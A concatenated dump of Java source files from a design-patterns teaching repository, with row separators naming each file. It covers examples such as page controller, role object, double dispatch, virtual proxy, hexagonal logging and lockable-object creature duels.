* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.NoArgsConstructor;
import lombok.extern.slf4j.Slf4j;
/**
* Signup View.
*/
@Slf4j
@NoArgsConstructor
public class SignupView {
public String display() {
LOGGER.info("display signup front page");
return "/signup";
}
/**
* redirect to user page.
*/
public String redirect(SignupModel form) {
LOGGER.info("Redirect to user page with " + "name " + form.getName() + " email " + form.getEmail());
return "redirect:/user";
}
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/SignupView.java |
1,076 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.leaderfollowers;
import lombok.extern.slf4j.Slf4j;
/**
* The TaskHandler is used by the {@link Worker} to process the newly arrived task.
*/
@Slf4j
public class TaskHandler {
/**
* This interface handles one task at a time.
*/
public void handleTask(Task task) throws InterruptedException {
var time = task.getTime();
Thread.sleep(time);
LOGGER.info("It takes " + time + " milliseconds to finish the task");
task.setFinished(true);
}
}
| iluwatar/java-design-patterns | leader-followers/src/main/java/com/iluwatar/leaderfollowers/TaskHandler.java |
1,077 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.roleobject;
import static com.iluwatar.roleobject.Role.BORROWER;
import static com.iluwatar.roleobject.Role.INVESTOR;
import lombok.extern.slf4j.Slf4j;
/**
* The Role Object pattern suggests to model context-specific views of an object as separate role
* objects which are dynamically attached to and removed from the core object. We call the resulting
* composite object structure, consisting of the core and its role objects, a subject. A subject
* often plays several roles and the same role is likely to be played by different subjects. As an
* example consider two different customers playing the role of borrower and investor, respectively.
* Both roles could as well be played by a single {@link Customer} object. The common superclass for
* customer-specific roles is provided by {@link CustomerRole}, which also supports the {@link
* Customer} interface.
*
* <p>The {@link CustomerRole} class is abstract and not meant to be instantiated.
* Concrete subclasses of {@link CustomerRole}, for example {@link BorrowerRole} or {@link
* InvestorRole}, define and implement the interface for specific roles. It is only these subclasses
* which are instantiated at runtime. The {@link BorrowerRole} class defines the context-specific
* view of {@link Customer} objects as needed by the loan department. It defines additional
* operations to manage the customer’s credits and securities. Similarly, the {@link InvestorRole}
* class adds operations specific to the investment department’s view of customers. A client like
* the loan application may either work with objects of the {@link CustomerRole} class, using the
* interface class {@link Customer}, or with objects of concrete {@link CustomerRole} subclasses.
* Suppose the loan application knows a particular {@link Customer} instance through its {@link
* Customer} interface. The loan application may want to check whether the {@link Customer} object
* plays the role of Borrower. To this end it calls {@link Customer#hasRole(Role)} with a suitable
* role specification. For the purpose of our example, let’s assume we can name roles with enum. If
* the {@link Customer} object can play the role named “Borrower,” the loan application will ask it
* to return a reference to the corresponding object. The loan application may now use this
* reference to call Borrower-specific operations.
*/
@Slf4j
public class ApplicationRoleObject {
/**
* Main entry point.
*
* @param args program arguments
*/
public static void main(String[] args) {
var customer = Customer.newCustomer(BORROWER, INVESTOR);
LOGGER.info(" the new customer created : {}", customer);
var hasBorrowerRole = customer.hasRole(BORROWER);
LOGGER.info(" customer has a borrowed role - {}", hasBorrowerRole);
var hasInvestorRole = customer.hasRole(INVESTOR);
LOGGER.info(" customer has an investor role - {}", hasInvestorRole);
customer.getRole(INVESTOR, InvestorRole.class)
.ifPresent(inv -> {
inv.setAmountToInvest(1000);
inv.setName("Billy");
});
customer.getRole(BORROWER, BorrowerRole.class)
.ifPresent(inv -> inv.setName("Johny"));
customer.getRole(INVESTOR, InvestorRole.class)
.map(InvestorRole::invest)
.ifPresent(LOGGER::info);
customer.getRole(BORROWER, BorrowerRole.class)
.map(BorrowerRole::borrow)
.ifPresent(LOGGER::info);
}
} | iluwatar/java-design-patterns | role-object/src/main/java/com/iluwatar/roleobject/ApplicationRoleObject.java |
1,078 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.identitymap;
/**
* Using Runtime Exception to control the flow in case Person Id doesn't exist.
*/
public class IdNotFoundException extends RuntimeException {
public IdNotFoundException(final String message) {
super(message);
}
}
| iluwatar/java-design-patterns | identity-map/src/main/java/com/iluwatar/identitymap/IdNotFoundException.java |
1,079 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.doubledispatch;
import lombok.Getter;
import lombok.Setter;
/**
* Game objects have coordinates and some other status information.
*/
@Getter
@Setter
public abstract class GameObject extends Rectangle {
private boolean damaged;
private boolean onFire;
public GameObject(int left, int top, int right, int bottom) {
super(left, top, right, bottom);
}
@Override
public String toString() {
return String.format("%s at %s damaged=%b onFire=%b", this.getClass().getSimpleName(),
super.toString(), isDamaged(), isOnFire());
}
public abstract void collision(GameObject gameObject);
public abstract void collisionResolve(FlamingAsteroid asteroid);
public abstract void collisionResolve(Meteoroid meteoroid);
public abstract void collisionResolve(SpaceStationMir mir);
public abstract void collisionResolve(SpaceStationIss iss);
}
| iluwatar/java-design-patterns | double-dispatch/src/main/java/com/iluwatar/doubledispatch/GameObject.java |
1,081 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.parameter.object;
import lombok.Getter;
/**
* enum for sort order types.
*/
public enum SortOrder {
ASC("asc"),
DESC("desc");
@Getter
private String value;
SortOrder(String value) {
this.value = value;
}
}
| iluwatar/java-design-patterns | parameter-object/src/main/java/com/iluwatar/parameter/object/SortOrder.java |
1,082 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.Data;
import lombok.NoArgsConstructor;
import org.springframework.stereotype.Component;
/**
* ignup model.
*/
@Component
@Data
@NoArgsConstructor
public class SignupModel {
private String name;
private String email;
private String password;
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/SignupModel.java |
1,083 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.virtual.proxy;
import lombok.Getter;
import lombok.extern.slf4j.Slf4j;
/**
* Represents a real video object that is expensive to create and manage.
*/
@Slf4j
@Getter
public class RealVideoObject implements ExpensiveObject {
public RealVideoObject() {
heavyInitialConfiguration();
}
private void heavyInitialConfiguration() {
LOGGER.info("Loading initial video configurations...");
}
@Override
public void process() {
LOGGER.info("Processing and playing video content...");
}
} | iluwatar/java-design-patterns | virtual-proxy/src/main/java/com/iluwatar/virtual/proxy/RealVideoObject.java |
1,084 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.eventlog;
import com.iluwatar.hexagonal.domain.PlayerDetails;
import lombok.extern.slf4j.Slf4j;
/**
* Standard output event log.
*/
@Slf4j
public class StdOutEventLog implements LotteryEventLog {
@Override
public void ticketSubmitted(PlayerDetails details) {
LOGGER.info("Lottery ticket for {} was submitted. Bank account {} was charged for 3 credits.",
details.email(), details.bankAccount());
}
@Override
public void ticketDidNotWin(PlayerDetails details) {
LOGGER.info("Lottery ticket for {} was checked and unfortunately did not win this time.",
details.email());
}
@Override
public void ticketWon(PlayerDetails details, int prizeAmount) {
LOGGER.info("Lottery ticket for {} has won! The bank account {} was deposited with {} credits.",
details.email(), details.bankAccount(), prizeAmount);
}
@Override
public void prizeError(PlayerDetails details, int prizeAmount) {
LOGGER.error("Lottery ticket for {} has won! Unfortunately the bank credit transfer of"
+ " {} failed.", details.email(), prizeAmount);
}
@Override
public void ticketSubmitError(PlayerDetails details) {
LOGGER.error("Lottery ticket for {} could not be submitted because the credit transfer"
+ " of 3 credits failed.", details.email());
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/eventlog/StdOutEventLog.java |
1,085 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
/** A human implementation of a Creature. */
public class Human extends Creature {
/**
* A constructor that initializes the attributes of a human.
*
* @param name as the name of the creature.
*/
public Human(String name) {
super(name);
setType(CreatureType.HUMAN);
setDamage(CreatureStats.HUMAN_DAMAGE.getValue());
setHealth(CreatureStats.HUMAN_HEALTH.getValue());
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Human.java |
1,087 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
import com.iluwatar.lockableobject.Lockable;
import java.security.SecureRandom;
import lombok.NonNull;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/** A Feind is a creature that wants to possess a Lockable object. */
public class Feind implements Runnable {
private final Creature creature;
private final Lockable target;
private final SecureRandom random;
private static final Logger LOGGER = LoggerFactory.getLogger(Feind.class.getName());
/**
* public constructor.
*
* @param feind as the creature to lock to he lockable.
* @param target as the target object.
*/
public Feind(@NonNull Creature feind, @NonNull Lockable target) {
this.creature = feind;
this.target = target;
this.random = new SecureRandom();
}
@Override
public void run() {
if (!creature.acquire(target)) {
fightForTheSword(creature, target.getLocker(), target);
} else {
LOGGER.info("{} has acquired the sword!", target.getLocker().getName());
}
}
/**
* Keeps on fighting until the Lockable is possessed.
*
* @param reacher as the source creature.
* @param holder as the foe.
* @param sword as the Lockable to possess.
*/
private void fightForTheSword(Creature reacher, @NonNull Creature holder, Lockable sword) {
LOGGER.info("A duel between {} and {} has been started!", reacher.getName(), holder.getName());
boolean randBool;
while (this.target.isLocked() && reacher.isAlive() && holder.isAlive()) {
randBool = random.nextBoolean();
if (randBool) {
reacher.attack(holder);
} else {
holder.attack(reacher);
}
}
if (reacher.isAlive()) {
if (!reacher.acquire(sword)) {
fightForTheSword(reacher, sword.getLocker(), sword);
} else {
LOGGER.info("{} has acquired the sword!", reacher.getName());
}
}
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Feind.java |
1,089 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.doubledispatch;
import com.iluwatar.doubledispatch.constants.AppConstants;
import lombok.extern.slf4j.Slf4j;
/**
* Space station Mir game object.
*/
@Slf4j
public class SpaceStationMir extends GameObject {
public SpaceStationMir(int left, int top, int right, int bottom) {
super(left, top, right, bottom);
}
@Override
public void collision(GameObject gameObject) {
gameObject.collisionResolve(this);
}
@Override
public void collisionResolve(FlamingAsteroid asteroid) {
LOGGER.info(AppConstants.HITS + " {} is damaged! {} is set on fire!", asteroid.getClass()
.getSimpleName(),
this.getClass().getSimpleName(), this.getClass().getSimpleName(), this.getClass()
.getSimpleName());
setDamaged(true);
setOnFire(true);
}
@Override
public void collisionResolve(Meteoroid meteoroid) {
logHits(meteoroid);
setDamaged(true);
}
@Override
public void collisionResolve(SpaceStationMir mir) {
logHits(mir);
setDamaged(true);
}
@Override
public void collisionResolve(SpaceStationIss iss) {
logHits(iss);
setDamaged(true);
}
private void logHits(GameObject gameObject) {
LOGGER.info(AppConstants.HITS, " {} is damaged!", gameObject.getClass().getSimpleName(),
this.getClass().getSimpleName(), this.getClass().getSimpleName());
}
} | iluwatar/java-design-patterns | double-dispatch/src/main/java/com/iluwatar/doubledispatch/SpaceStationMir.java |
1,090 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.intercepting.filter;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import lombok.RequiredArgsConstructor;
import lombok.Setter;
/**
* Order class carries the order data.
*/
@Getter
@Setter
@NoArgsConstructor
@AllArgsConstructor
public class Order {
private String name;
private String contactNumber;
private String address;
private String depositNumber;
private String orderItem;
}
| iluwatar/java-design-patterns | intercepting-filter/src/main/java/com/iluwatar/intercepting/filter/Order.java |
1,091 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject;
import java.io.Serial;
/**
* An exception regarding the locking process of a Lockable object.
*/
public class LockingException extends RuntimeException {
@Serial
private static final long serialVersionUID = 8556381044865867037L;
public LockingException(String message) {
super(message);
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/LockingException.java |
1,092 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.lockableobject.domain;
import com.iluwatar.lockableobject.Lockable;
import java.util.HashSet;
import java.util.Set;
import lombok.Getter;
import lombok.NonNull;
import lombok.Setter;
import lombok.extern.slf4j.Slf4j;
/**
* An abstract class of a creature that wanders across the wasteland. It can attack, get hit and
* acquire a Lockable object.
*/
@Getter
@Setter
@Slf4j
public abstract class Creature {
private String name;
private CreatureType type;
private int health;
private int damage;
Set<Lockable> instruments;
protected Creature(@NonNull String name) {
this.name = name;
this.instruments = new HashSet<>();
}
/**
* Reaches for the Lockable and tried to hold it.
*
* @param lockable as the Lockable to lock.
* @return true of Lockable was locked by this creature.
*/
public boolean acquire(@NonNull Lockable lockable) {
if (lockable.lock(this)) {
instruments.add(lockable);
return true;
}
return false;
}
/** Terminates the Creature and unlocks all the Lockable that it possesses. */
public synchronized void kill() {
LOGGER.info("{} {} has been slayed!", type, name);
for (Lockable lockable : instruments) {
lockable.unlock(this);
}
this.instruments.clear();
}
/**
* Attacks a foe.
*
* @param creature as the foe to be attacked.
*/
public synchronized void attack(@NonNull Creature creature) {
creature.hit(getDamage());
}
/**
* When a creature gets hit it removed the amount of damage from the creature's life.
*
* @param damage as the damage that was taken.
*/
public synchronized void hit(int damage) {
if (damage < 0) {
throw new IllegalArgumentException("Damage cannot be a negative number");
}
if (isAlive()) {
setHealth(getHealth() - damage);
if (!isAlive()) {
kill();
}
}
}
/**
* Checks if the creature is still alive.
*
* @return true of creature is alive.
*/
public synchronized boolean isAlive() {
return getHealth() > 0;
}
}
| iluwatar/java-design-patterns | lockable-object/src/main/java/com/iluwatar/lockableobject/domain/Creature.java |
1,093 | /*
